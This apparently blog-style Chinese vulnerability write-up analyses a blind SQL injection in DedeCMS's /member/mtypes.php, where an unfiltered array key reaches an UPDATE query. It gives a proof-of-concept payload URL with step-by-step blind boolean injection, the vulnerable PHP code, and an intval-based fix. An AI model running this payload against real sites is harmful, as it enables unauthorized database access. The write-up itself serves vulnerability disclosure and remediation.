dedecms /member/mtypes.php SQL Injection Vul

Posted 2022-09-02 郑瀚Andrew

dedecms /member/mtypes.php SQL Injection Vul

catalog

1. 漏洞描述
2. 漏洞触发条件
3. 漏洞影响范围
4. 漏洞代码分析
5. 防御方法
6. 攻防思考

 

1. 漏洞描述

Dedecms会员中心注入漏洞

2. 漏洞触发条件

因为是update注入，并且用了>ExecuteNoneQuery所以不能采用benchmark延时注入，但是可以通过一个"返回状态差异"判断来进行忙注，如果条件成功那么mtypename=$name就会被update了

1. 首先打开: http://127.0.0.1/dedecms5.5/member/mtypes.php
2. 添加一个分类，记住ID(1)，和原来的分类名称(fenlei)
3. 然后打开: http://127.0.0.1/dedecms5.5/member/mtypes.php?dopost=save&mtypename[1 or @`` AND 1%3D1 and (select r)%3Dr and 1%3D1]=4
//将其中的1改成你的分类ID
4. 结束之后打开之后返回: http://127.0.0.1/dedecms5.5/member/mtypes.php 
//如果(select r)=r的话 那么分类名称就被改成了4！ 这样我们就能来判断是否满足条件了，二值判断注入

Relevant Link

http://www.wooyun.org/bugs/wooyun-2010-048880
http://www.0x50sec.org/0day-exp/2012/12/id/1482/comment-page-1/#comment-57057

3. 漏洞影响范围
4. 漏洞代码分析

/member/mtypes.php

elseif ($dopost == save)

    if(isset($mtypeidarr) && is_array($mtypeidarr))
    
        $delids = 0;
        $mtypeidarr = array_filter($mtypeidarr, is_numeric);
        foreach($mtypeidarr as $delid)
        
            $delids .= ,.$delid;
            unset($mtypename[$delid]);
        
        $query = "delete from `#@__mtypes` where mtypeid in ($delids) and mid=$cfg_ml->M_ID;";
        $dsql->ExecNoneQuery($query);
     
    //通过$mtypename进行key注入
    foreach ($mtypename as $id => $name)
    
        $name = htmlReplace($name);
        //未对键值$id进行任何过滤就带入查询，导致注入
        $query = "update `#@__mtypes` set mtypename=$name where mtypeid=$id and mid=$cfg_ml->M_ID"; 
        $dsql->ExecuteNoneQuery($query);
    
    ShowMsg(分类修改完成,mtypes.php);

5. 防御方法

/member/mtypes.php

elseif ($dopost == save)

    if(isset($mtypeidarr) && is_array($mtypeidarr))
    
        $delids = 0;
        $mtypeidarr = array_filter($mtypeidarr, is_numeric);
        foreach($mtypeidarr as $delid)
        
            $delids .= ,.$delid;
            unset($mtypename[$delid]);
        
        $query = "delete from `#@__mtypes` where mtypeid in ($delids) and mid=$cfg_ml->M_ID;";
        $dsql->ExecNoneQuery($query);
     
    //通过$mtypename进行key注入
    foreach ($mtypename as $id => $name)
    
        $name = HtmlReplace($name);
        /* 对$id进行规范化处理 */
        $id = intval($id);
        /* */
        $query = "update `#@__mtypes` set mtypename=$name where mtypeid=$id and mid=$cfg_ml->M_ID";  
        $dsql->ExecuteNoneQuery($query);
    
    ShowMsg(分类修改完成,mtypes.php);

通过intval规范互处理，使得黑客注入的盲注语句失效，即不管任何时候，返回结果都是能成功修改为4，即盲注的二值条件不存在了

6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved